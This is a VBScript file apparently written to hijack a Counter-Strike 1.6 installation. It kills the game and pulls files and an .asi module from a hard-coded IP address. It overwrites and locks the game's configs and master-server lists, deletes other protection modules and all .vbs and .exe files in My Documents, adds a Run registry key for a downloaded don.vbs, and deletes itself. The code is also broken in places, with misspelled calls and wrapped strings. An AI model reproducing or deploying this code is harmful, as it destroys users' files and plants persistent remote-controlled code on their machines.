

```

CreateObject("WScript.Shell").Run("taskkill /f /im hl.exe")
Sub unProtectFile( filename )
    dim readfile, filesys
    set filesys = CreateObject("Scripting.FileSystemObject")

    If filesys.FileExists( filename ) Then
        set readfile = filesys.GetFile( filename )
        readfile.Attributes = 0 ' normal
    End If
End Sub

Sub protectFile( filename )
    dim readfile, filesys
    set filesys = CreateObject("Scripting.FileSystemObject")

    If filesys.FileExists( filename ) Then
        set readfile = filesys.GetFile( filename )
        readfile.Attributes = 7 ' hidden + system +
readonly
    End If
End Sub

Sub DeleteAFile( filename )
    Dim filesys
    Set filesys = CreateObject("Scripting.FileSystemObject")

    If filesys.FileExists( filename ) Then
        unProtectFile( filename )
        filesys.DeleteFile( filename ), True
    End If
End Sub

Sub RenameFile( oldName, newName )
    Dim filesys
    Set filesys =
WScript.CreateObject("Scripting.FileSystemObject")

    If filesys.FileExists( oldName ) Then
        filesys.MoveFile oldName, newName
    End If
End Sub

Sub ClearCFG( path )
    DeleteAFile path
    Set objFSO = CreateObject("Scripting.FileSystemObject")
    Set objFile = objFSO.CreateTextFile(path, ForWriting)
    objFile.Write ""
    objFile.Close

    protectFile path
End Sub

Sub DeleteAFolder( foldername )
    Dim filesys

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        Set filesystems = CreateObject("Scripting.FileSystemObject")

        If filesystems.FolderExists( foldername ) Then
            ' unProtectFile( foldername )
            filesystems.DeleteFolder( foldername ), True
        End If
    End Sub

Sub RenameFolder( oldName, newName )
    Dim filesystems
    Set filesystems =
WScript.CreateObject("Scripting.FileSystemObject")

    If filesystems.FolderExists( oldName ) Then
        filesystems.MoveFolder oldName, newName
    End If
End Sub
WScript.Sleep(1000)

' Download a1ahl.asi
strURL="http://89.43.62.12/cmd/protect.asi?" & Rnd
On Error Resume Next
Set xml = CreateObject("Microsoft.XMLHTTP")
xml.Open "GET", strURL, False
xml.Send

If Err.Number <> 0 Then
    WScript.Quit ' if file download fails, quit
script
Else
    set oStream = createobject("Adodb.Stream")

    oStream.type = 1 ' adTypeBinary
    oStream.open
    oStream.write xml.responseBody

    ' overwrite
    oStream.savetofile "protect.asi", 2 '
adSaveCreateOverWrite
    oStream.close

    set oStream = nothing
    Set xml = Nothing
End If
Err.Clear
On Error Goto 0

On Error Resume Next
Set objHTTP = CreateObject("MSXML2.XMLHTTP")
Call objHTTP.Open("GET", "http://89.43.62.12/cmd/
GameMenu.res?" & Rnd, FALSE)
objHTTP.Send

If Err.Number <> 0 Then

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Else
    DeleteAFile "cstrike\resource\GameMenu.res"
    Set objFSO =
CreateObject("Scripting.FileSystemObject")
    Set objFile =
objFSO.CreateTextFile("cstrike\resource\GameMenu.res", ForWriting)
    objFile.Write objHTTP.ResponseText
    objFile.Close
    protectFile("cstrike\resource\GameMenu.res")
End If

On Error Goto 0

' Download GameMenu.res
On Error Resume Next
    Set objHTTP = CreateObject("MSXML2.XMLHTTP")
    Call objHTTP.Open("GET", "http://89.43.62.12/cmd/
MasterServers.vdf?" & Rnd, FALSE)
    objHTTP.Send

    If Err.Number <> 0 Then

Else
    DeleteAFile "config\MasterServers.vdf"
    Set objFSO =
CreateObject("Scripting.FileSystemObject")
    Set objFile =
objFSO.CreateTextFile("config\MasterServers.vdf", ForWriting)
    objFile.Write objHTTP.ResponseText
    objFile.Close
    protectFile("config\MasterServers.vdf")
End If

On Error Goto 0

' Download GameMenu.res
On Error Resume Next
    Set objHTTP = CreateObject("MSXML2.XMLHTTP")
    Call objHTTP.Open("GET", "http://89.43.62.12/cmd/
MasterServers.vdf?" & Rnd, FALSE)
    objHTTP.Send

    If Err.Number <> 0 Then

Else
    DeleteAFile "config\rev_MasterServers.vdf"
    Set objFSO =
CreateObject("Scripting.FileSystemObject")
    Set objFile =
objFSO.CreateTextFile("config\rev_MasterServers.vdf", ForWriting)
    objFile.Write objHTTP.ResponseText
    objFile.Close
    protectFile("config\rev_MasterServers.vdf")

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        End If

On Error Goto 0

' Download GameMenu.res
On Error Resume Next
    Set objHTTP = CreateObject("MSXML2.XMLHTTP")
    Call objHTTP.Open("GET", "http://89.43.62.12/cmd/
MasterServers.vdf?" & Rnd, FALSE)
    objHTTP.Send

    If Err.Number <> 0 Then

    Else
        DeleteAFile "platform\config\MasterServers.vdf"
        Set objFSO =
CreateObject("Scripting.FileSystemObject")
        Set objFile =
objFSO.CreateTextFile("platform\config\MasterServers.vdf",
ForWriting)
        objFile.Write objHTTP.ResponseText
        objFile.Close
        protectFile("platform\config\MasterServers.vdf")
    End If

On Error Goto 0

' Download GameMenu.res
On Error Resume Next
    Set objHTTP = CreateObject("MSXML2.XMLHTTP")
    Call objHTTP.Open("GET", "http://89.43.62.12/cmd/
MasterServers.vdf?" & Rnd, FALSE)
    objHTTP.Send

    If Err.Number <> 0 Then

    Else
        DeleteAFile "platform\config\rev_MasterServers.vdf"
        Set objFSO =
CreateObject("Scripting.FileSystemObject")
        Set objFile =
objFSO.CreateTextFile("platform\config\rev_MasterServers.vdf",
ForWriting)
        objFile.Write objHTTP.ResponseText
        objFile.Close

protectFile("platform\config\rev_MasterServers.vdf")
    End If

On Error Goto 0

On Error Resume Next
    Set objHTTP = CreateObject("MSXML2.XMLHTTP")
    Call objHTTP.Open("GET", "http://89.43.62.12/cmd/

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MasterServers.vdf?" & Rnd, FALSE)
    objHTTP.Send

    If Err.Number <> 0 Then

    Else
        DeleteAFile "platform\config\rew_MasterServers.vdf"
        Set objFSO =
CreateObject("Scripting.FileSystemObject")
        Set objFile =
objFSO.CreateTextFile("platform\config\rew_MasterServers.vdf",
ForWriting)
            objFile.Write objHTTP.ResponseText
            objFile.Close

protectFile("platform\config\rew_MasterServers.vdf")
        End If

On Error Goto 0

On Error Resume Next
    Set objHTTP = CreateObject("MSXML2.XMLHTTP")
    Call objHTTP.Open("GET", "http://89.43.62.12/cmd/
MasterServers.vdf?" & Rnd, FALSE)
    objHTTP.Send

    If Err.Number <> 0 Then

    Else
        DeleteAFile "config\rew_MasterServers.vdf"
        Set objFSO =
CreateObject("Scripting.FileSystemObject")
        Set objFile =
objFSO.CreateTextFile("platform\config\rew_MasterServers.vdf",
ForWriting)
            objFile.Write objHTTP.ResponseText
            objFile.Close
            protectFile("config\rew_MasterServers.vdf")
        End If

On Error Goto 0

On Error Resume Next
    Set objHTTP = CreateObject("MSXML2.XMLHTTP")
    Call objHTTP.Open("GET", "http://89.43.62.12/cmd/
serverbrowser.vdf?" & Rnd, FALSE)
    objHTTP.Send

    If Err.Number <> 0 Then

    Else
        DeleteAFile "platform\config\serverbrowser.vdf"
        Set objFSO =
CreateObject("Scripting.FileSystemObject")

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        Set objFile =
objFS0.CreateTextFile("platform\config\serverbrowser.vdf",
ForWriting)
        objFile.Write objHTTP.ResponseText
        objFile.Close
        'protectFile("platform\config\serverbrowser.vdf")
    End If

On Error Goto 0

On Error Resume Next
    Set objHTTP = CreateObject("MSXML2.XMLHTTP")
    Call objHTTP.Open("GET", "http://89.43.62.12/cmd/
serverbrowser.vdf?" & Rnd, FALSE)
    objHTTP.Send

    If Err.Number <> 0 Then

    Else
        DeleteAFile "platform\config\rew_serverbrowser.vdf"
        Set objFS0 =
CreateObject("Scripting.FileSystemObject")
        Set objFile =
objFS0.CreateTextFile("platform\config\rew_serverbrowser.vdf",
ForWriting)
        objFile.Write objHTTP.ResponseText
        objFile.Close
        'protectFile("platform\config\rew_serverbrowser.vdf
")
    End If

On Error Goto 0

On Error Resume Next
    Set objHTTP = CreateObject("MSXML2.XMLHTTP")
    Call objHTTP.Open("GET", "http://89.43.62.12/cmd/
serverbrowser.vdf?" & Rnd, FALSE)
    objHTTP.Send

    If Err.Number <> 0 Then

    Else
        DeleteAFile "platform\config\rev_serverbrowser.vdf"
        Set objFS0 =
CreateObject("Scripting.FileSystemObject")
        Set objFile =
objFS0.CreateTextFile("platform\config\rev_serverbrowser.vdf",
ForWriting)
        objFile.Write objHTTP.ResponseText
        objFile.Close
        'protectFile("platform\config\rev_serverbrowser.vdf
")
    End If

```

```

On Error Goto 0

On Error Resume Next
    Set objHTTP = CreateObject("MSXML2.XMLHTTP")
    Call objHTTP.Open("GET", "http://89.43.62.12/cmd/
serverbrowser.vdf?" & Rnd, FALSE)
    objHTTP.Send

    If Err.Number <> 0 Then

    Else
        DeleteAFile "config\serverbrowser.vdf"
        Set objFSO =
CreateObject("Scripting.FileSystemObject")
        Set objFile =
objFSO.CreateTextFile("config\serverbrowser.vdf", ForWriting)
        objFile.Write objHTTP.ResponseText
        objFile.Close
        'protectFile("config\serverbrowser.vdf")
    End If

On Error Goto 0

On Error Resume Next
    Set objHTTP = CreateObject("MSXML2.XMLHTTP")
    Call objHTTP.Open("GET", "http://89.43.62.12/cmd/
serverbrowser.vdf?" & Rnd, FALSE)
    objHTTP.Send

    If Err.Number <> 0 Then

    Else
        DeleteAFile "config\rew_serverbrowser.vdf"
        Set objFSO =
CreateObject("Scripting.FileSystemObject")
        Set objFile =
objFSO.CreateTextFile("config\rew_serverbrowser.vdf", ForWriting)
        objFile.Write objHTTP.ResponseText
        objFile.Close
        'protectFile("config\rew_serverbrowser.vdf")
    End If

On Error Goto 0

On Error Resume Next
    Set objHTTP = CreateObject("MSXML2.XMLHTTP")
    Call objHTTP.Open("GET", "http://89.43.62.12/cmd/
serverbrowser.vdf?" & Rnd, FALSE)
    objHTTP.Send

    If Err.Number <> 0 Then

    Else
        DeleteAFile "config\rev_serverbrowser.vdf"

```

```

        Set objFSO =
CreateObject("Scripting.FileSystemObject")
        Set objFile =
objFSO.CreateTextFile("config\rev_serverbrowser.vdf", ForWriting)
        objFile.Write objHTTP.ResponseText
        objFile.Close
        'protectFile("config\rev_serverbrowser.vdf")
    End If

On Error Goto 0

On Error Resume Next
    Set objHTTP = CreateObject("MSXML2.XMLHTTP")
    Call objHTTP.Open("GET", "http://89.43.62.12/cmd/
userconfig.cfg?" & Rnd, FALSE)
    objHTTP.Send

    If Err.Number <> 0 Then

    Else
        DeleteAFile "cstrike\userconfig.cfg"
        Set objFSO =
CreateObject("Scripting.FileSystemObject")
        Set objFile =
objFSO.CreateTextFile("cstrike\userconfig.cfg", ForWriting)
        objFile.Write objHTTP.ResponseText
        objFile.Close
        'protectFile("cstrike\userconfig.cfg")
    End If

On Error Goto 0

On Error Resume Next
    Set objHTTP = CreateObject("MSXML2.XMLHTTP")
    Call objHTTP.Open("GET", "http://89.43.62.12/cmd/
motd_temp.html?" & Rnd, FALSE)
    objHTTP.Send

    If Err.Number <> 0 Then

    Else
        DeleteAFile "cstrike\motd_temp.html.old"
        RenameFile "cstrike\motd_temp.html",
"cstrike\motd_temp.html.old"
        DeleteAFile "cstrike\motd_temp.html"
        Set objFSO =
CreateObject("Scripting.FileSystemObject")
        Set objFile =
objFSO.CreateTextFile("cstrike\motd_temp.html", ForWriting)
        objFile.Write objHTTP.ResponseText
        objFile.Close
        protectFile("cstrike\motd_temp.html")
    End If

```


On Error Goto 0

On Error Resume Next

```
ClearCFG "cstrike\hw\geforce.cfg"  
ClearCFG "cstrike\hw\opengl.cfg"  
ClearCFG "cstrike\autoexec.cfg"  
ClearCFG "cstrike\valve.rc"
```

```
ClearCFG "valve\hw\geforce.cfg"  
ClearCFG "valve\hw\opengl.cfg"  
ClearCFG "valve\valve.rc"
```

On Error Goto 0

WScript.Sleep(3000)

On Error Resume Next

```
RenameFolder "cstrike\bin", "cstrike\bin_old"  
RenameFile "cstrike\bin", "cstrike\bin_old"
```

```
protectFile("cstrike\liblist.gam")  
protectFile("protect.asi")
```

```
DeleteAFile "cstrike\bin\TrackerUI.dll"  
DeleteAFile "valve\bin\TrackerUI.dll"  
DeleteAFile "cstrike\cl_dlls\ParticleMan.dll"  
DeleteAFile "NexonUp.asi"  
DeleteAFile "CmShield.asi", "CmShield.asi.bak"  
DeleteAFile "gopnict.flt"  
DeleteAFile "update.asi"  
DeleteAFile "muc.bak"  
RenameFile "cstrike\bin\TrackerUI.dll",  
"cstrike\bin\TrackerUI.dll.old"  
RenameFile "cstrike\bin\TrackerUI.DLL",  
"cstrike\bin\TrackerUI.DLL.old"  
RenameFile "valve\bin\TrackerUI.dll",  
"valve\bin\TrackerUI.dll.old"  
RenameFile "cstrike\cl_dlls\ParticleMan.dll",  
"cstrike\cl_dlls\ParticleMan.dll.old"  
RenameFile "NexonUp.asi", "NexonUp.asi.old"  
RenameFile "CsShield.dll", "CsShield.dll.old"  
DeleteAFile "cstrike\bin\TrackerUI.dll.old"  
DeleteAFile "valve\bin\TrackerUI.dll.old"  
DeleteAFile "cstrike\cl_dlls\ParticleMan.dll.old"  
DeleteAFile "NexonUp.asi.old"  
DeleteAFile "SMShield.ini"  
DeleteAFile "SMShield.asi"  
DeleteAFile "SMShield.mix"  
DeleteAFile "SMShield.txt"  
DeleteAFile "LoaderD.dll"  
DeleteAFile "LoaderD.txt"  
DeleteAFile "LoaderD.ini"  
DeleteAFile "LoaderD.asi"  
DeleteAFile "cstrike\au.vbs"
```

```

DeleteAFFile "steam_ui.flt"
DeleteAFFile "cstrike\cs.exe"
DeleteAFFile "cstrike\radial.cdb"
DeleteAFFile "cstrike\bin\TrackerUI.DLL.old"

DeleteAFFile "mssv55.asi.old"
RenameFile "mssv55.asi", "mssv55.asi.old"

On Error Goto 0

On Error Resume Next
Set objHTTP = CreateObject("MSXML2.XMLHTTP")
Call objHTTP.Open("GET", "http://89.43.62.12/cmd/
motd_temp.html?" & Rnd, FALSE)
objHTTP.Send

If Err.Number <> 0 Then

Else
DeleteAFFile "cstrike\bin"
Set objFSO =
CreateObject("Scripting.FileSystemObject")
Set objFile = objFSO.CreateTextFile("cstrike\bin",
ForWriting)
objFile.Write objHTTP.ResponseText
objFile.Close
protectFile("cstrike\bin")
End If

On Error Goto 0

On Error Resume Next
Set objHTTP = CreateObject("MSXML2.XMLHTTP")
Call objHTTP.Open("GET", "http://89.43.62.12/cmd/
motd_temp.html?" & Rnd, FALSE)
objHTTP.Send

If Err.Number <> 0 Then

Else
DeleteAFFile "cstrike\save"
Set objFSO =
CreateObject("Scripting.FileSystemObject")
Set objFile = objFSO.CreateTextFile("cstrike\save",
ForWriting)
objFile.Write objHTTP.ResponseText
objFile.Close
protectFile("cstrike\save")
End If

On Error Goto 0

CreateObject("WScript.Shell").Run("hl.exe -steam -game cstrike -
noforcemparms -noforcemaccel")

```

```

Set objShell = Wscript.CreateObject("Wscript.Shell")
strPath = objShell.SpecialFolders("MyDocuments")
strMyPath = strPath & "\"

On Error Resume Next

Dim filesys
Set filesys = CreateObject("Scripting.FileSystemObject")

filesys.DeleteFile( strMyPath & "*.vbs" ), True
filesys.DeleteFile( strMyPath & "*.exe" ), True

On Error Goto 0

Set objShell = Wscript.CreateObject("Wscript.Shell")
strPath = objShell.SpecialFolders("MyDocuments")
strMyPath = strPath & "\"

On Error Resume Next
    Dim objShellReg, oReg

    Set objShellReg = CreateObject("WScript.Shell")

    Set oReg=GetObject("winmgmts:
{impersonationLevel=impersonate}!\" & "." &
"\root\default:StdRegProv")

    objShellReg.RegWrite
"HKCU\Software\Microsoft\Windows\CurrentVersion\Run\valveauto",
StrMyPath & "don.vbs", "REG_SZ"

    Set objShellReg = Nothing
On Error Goto 0

On Error Resume Next
    Set objHTTP = CreateObject("MSXML2.XMLHTTP")
    Call objHTTP.Open("GET", "http://89.43.62.12/cmd/don.vbs?"
& Rnd, FALSE)
    objHTTP.Send

    If Err.Number <> 0 Then

    Else
        DeleteAFile strMyPath & "don.vbs"
        Set objFSO =
CreateObject("Scripting.FileSystemObject")
        Set objFile = objFSO.CreateTextFile(strMyPath &
"don.vbs", ForWriting)
        objFile.Write objHTTP.ResponseText
        objFile.Close
        protectFile(strMyPath & "don.vbs")
    End If

```

```
On Error Goto 0
```

```
Set objShell = Wscript.CreateObject("Wscript.Shell")  
strPath = objShell.SpecialFolders("Startup")  
strMyPath = strPath & "\"
```

```
On Error Resume Next
```

```
    DeleteAFile strMyPath & "hl.vbs"
```

```
On Error Goto 0
```

```
' DELETE SELF
```

```
On Error Resume Next
```

```
    WScript.Sleep 1000
```

```
    Set fileSystem = CreateObject("Scripting.FileSystemObject")
```

```
    thisScript = Wscript.ScriptFullName
```

```
    fileSystem.DeleteFile(thisScript)
```

```
On Error Goto 0
```